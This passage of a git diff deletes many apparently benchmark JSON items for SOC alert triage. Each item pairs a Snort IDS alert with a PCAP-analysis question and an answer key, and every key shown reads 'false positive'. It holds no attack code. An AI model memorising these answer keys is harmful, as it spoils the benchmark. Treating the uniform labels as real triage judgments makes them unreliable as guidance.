+0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_5", - "alert_type": "False", - "alert_name": "false_alert_5" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:45:57.649802 [**] [1:895:19] \"SERVER-WEBAPP redirect access\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.10.9:62876 -> 54.164.201.153:80", - "alert": "07/03-08:45:57.649802 [**] [1:895:19] \"SERVER-WEBAPP redirect access\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.10.9:62876 -> 54.164.201.153:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_14.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_14.json deleted file mode 100644 index e7c3213aea17f31fcb35ee4a3f6d36ca767b2754..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_14.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_6", - "alert_type": "False", - "alert_name": "false_alert_6" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:47:50.612239 [**] [1:1010:21] \"SERVER-IIS encoding access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.9:63310 -> 68.67.178.111:80", - "alert": "07/03-08:47:50.612239 [**] [1:1010:21] \"SERVER-IIS encoding access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.9:63310 -> 68.67.178.111:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_15.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_15.json deleted file mode 100644 index e3e5207342924422ad36a5a269855968e0cf51b9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_15.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_7", - "alert_type": "False", - "alert_name": "false_alert_7" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-09:42:13.967956 [**] [1:1200:17] \"INDICATOR-COMPROMISE Invalid URL\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 104.88.86.189:80 -> 192.168.10.25:53233", - "alert": "07/03-09:42:13.967956 [**] [1:1200:17] \"INDICATOR-COMPROMISE Invalid URL\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 104.88.86.189:80 -> 192.168.10.25:53233", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_16.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_16.json deleted file mode 100644 index 5cd6e1e0b197fb4140102f32d0589e5e83c4d7b8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_16.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_8", - "alert_type": "False", - "alert_name": "false_alert_8" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-10:25:34.417585 [**] [1:1560:14] \"SERVER-WEBAPP /doc/ access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.9:2883 -> 23.194.182.116:80", - "alert": "07/03-10:25:34.417585 [**] [1:1560:14] \"SERVER-WEBAPP /doc/ access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.9:2883 -> 23.194.182.116:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_17.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_17.json deleted file mode 100644 index dd9fcb914d13cce62561b9d1b57fb8420000212a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_17.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_9", - "alert_type": "False", - "alert_name": "false_alert_9" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-14:04:29.612732 [**] [1:2667:14] \"SERVER-IIS ping.asp access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.17:50598 -> 34.205.104.161:80", - "alert": "07/03-14:04:29.612732 [**] [1:2667:14] \"SERVER-IIS ping.asp access\" [**] [Classification: Access to a potentially vulnerable web application] [Priority: 2] {TCP} 192.168.10.17:50598 -> 34.205.104.161:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_18.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_18.json deleted file mode 100644 index e4332c2208df598b11d00c371b7800bedaee7b12..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_18.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3", - "alert_type": "False", - "alert_name": "false_alert_10" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:35:53.528107 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:35:53.528107 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_19.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_19.json deleted file mode 100644 index bd84f936df68465071211405e0da630d29e77d03..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_19.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_1", - "alert_type": "False", - "alert_name": "false_alert_11" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-16:01:23.216669 [**] [122:23:1] \"(port_scan) UDP filtered portsweep\" [**] [Priority: 3] {UDP} 192.168.10.12:8612 -> 192.168.10.255:8610", - "alert": "07/03-16:01:23.216669 [**] [122:23:1] \"(port_scan) UDP filtered portsweep\" [**] [Priority: 3] {UDP} 192.168.10.12:8612 -> 192.168.10.255:8610", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_2.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_2.json deleted file mode 100644 index ceab71443c3f074997ca890366316f73bf57fd3c..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_2.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "ea1", - "alert_type": "False", - "alert_name": "false_alert_12" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-09:08:00.277330 [**] [1:40063:5] \"OS-LINUX Linux Kernel Challenge ACK provocation attempt\" [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.10.25:50189 -> 23.46.180.139:443", - "alert": "07/07-09:08:00.277330 [**] [1:40063:5] \"OS-LINUX Linux Kernel Challenge ACK provocation attempt\" [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.10.25:50189 -> 23.46.180.139:443", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_20.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_20.json deleted file mode 100644 index f00a81ba300ae31b8c4b8c1d152e5350ff52338d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_20.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_2", - "alert_type": "False", - "alert_name": "false_alert_13" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-15:51:04.710387 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 23.203.82.243:443 -> 192.168.10.17:51951", - "alert": "07/03-15:51:04.710387 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 23.203.82.243:443 -> 192.168.10.17:51951", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_21.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_21.json deleted file mode 100644 index 1f54774ff32c582cf6f6c3557f583d054645adc4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_21.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_3", - "alert_type": "False", - "alert_name": "false_alert_14" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-15:50:50.319339 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 192.168.10.25:64668 -> 151.101.20.207:443", - "alert": "07/03-15:50:50.319339 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 192.168.10.25:64668 -> 151.101.20.207:443", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_22.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_22.json deleted file mode 100644 index 00cc824a40f9dfe37efb2ba1a2c142ceec257a97..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_22.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_4", - "alert_type": "False", - "alert_name": "false_alert_15" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-15:37:54.031284 [**] [137:1:1] \"(ssl) invalid client HELLO after server HELLO detected\" [**] [Priority: 3] {TCP} 192.168.10.25:63605 -> 192.243.232.58:443", - "alert": "07/03-15:37:54.031284 [**] [137:1:1] \"(ssl) invalid client HELLO after server HELLO detected\" [**] [Priority: 3] {TCP} 192.168.10.25:63605 -> 192.243.232.58:443", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_23.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_23.json deleted file mode 100644 index 2b793612d37467f20ee8766d15df0529ad4d7705..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_23.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_5", - "alert_type": "False", - "alert_name": "false_alert_16" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-15:22:56.432352 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 192.168.10.25:61810 -> 81.90.96.10:443", - "alert": "07/03-15:22:56.432352 [**] [122:3:1] \"(port_scan) TCP portsweep\" [**] [Priority: 3] {TCP} 192.168.10.25:61810 -> 81.90.96.10:443", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_24.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_24.json deleted file mode 100644 index 0ef21e600ea047e408d721b346389366922e2cf0..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_24.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_6", - "alert_type": "False", - "alert_name": "false_alert_17" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-10:04:59.114288 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 192.168.10.3:389 -> 192.168.10.25:56155", - "alert": "07/03-10:04:59.114288 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 192.168.10.3:389 -> 192.168.10.25:56155", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_25.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_25.json deleted file mode 100644 index 901c9e80a1a8fbb38763583972855c9a8d2d39db..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_25.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_7", - "alert_type": "False", - "alert_name": "false_alert_18" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:28:51.366471 [**] [122:23:1] \"(port_scan) UDP filtered portsweep\" [**] [Priority: 3] {UDP} 192.168.10.5:54077 -> 192.168.10.3:53", - "alert": "07/03-08:28:51.366471 [**] [122:23:1] \"(port_scan) UDP filtered portsweep\" [**] [Priority: 3] {UDP} 192.168.10.5:54077 -> 192.168.10.3:53", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_26.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_26.json deleted file mode 100644 index 57adeb435b04a1a14fa91d5762cc7052fa6049f4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_26.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_4", - "alert_type": "False", - "alert_name": "false_alert_19" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:39:59.907940 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:39:59.907940 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_27.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_27.json deleted file mode 100644 index e6186af33f1effa5ebc030fa39a9ccf4acc3416d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_27.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_5", - "alert_type": "False", - "alert_name": "false_alert_20" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:41:16.831986 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:41:16.831986 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_28.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_28.json deleted file mode 100644 index 3203cf7bbad4fa3c8759b4840ee51a2a23aede06..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_28.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_6", - "alert_type": "False", - "alert_name": "false_alert_21" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-09:18:02.399625 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.27.145.213:80 -> 192.168.10.51:54506", - "alert": "07/03-09:18:02.399625 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.27.145.213:80 -> 192.168.10.51:54506", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_29.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_29.json deleted file mode 100644 index fe6a4bf74090fbd2b13dd6c61e60684323c1a1ce..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_29.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_8", - "alert_type": "False", - "alert_name": "false_alert_22" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-13:45:33.806533 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.24.24.85:80 -> 192.168.10.17:38619", - "alert": "07/03-13:45:33.806533 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.24.24.85:80 -> 192.168.10.17:38619", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_3.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_3.json deleted file mode 100644 index b4b3bfc03455927731fca5232f0c83fce6a53835..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_3.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "if1", - "alert_type": "False", - "alert_name": "false_alert_23" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-08:04:51.819436 [**] [1:1201:13] \"INDICATOR-COMPROMISE 403 Forbidden\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 23.15.4.9:80 -> 192.168.10.14:49536", - "alert": "07/07-08:04:51.819436 [**] [1:1201:13] \"INDICATOR-COMPROMISE 403 Forbidden\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 23.15.4.9:80 -> 192.168.10.14:49536", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_30.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_30.json deleted file mode 100644 index f4698757f28b3c86fe151550e83af4c8ce0356b5..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_30.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_9", - "alert_type": "False", - "alert_name": "false_alert_24" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 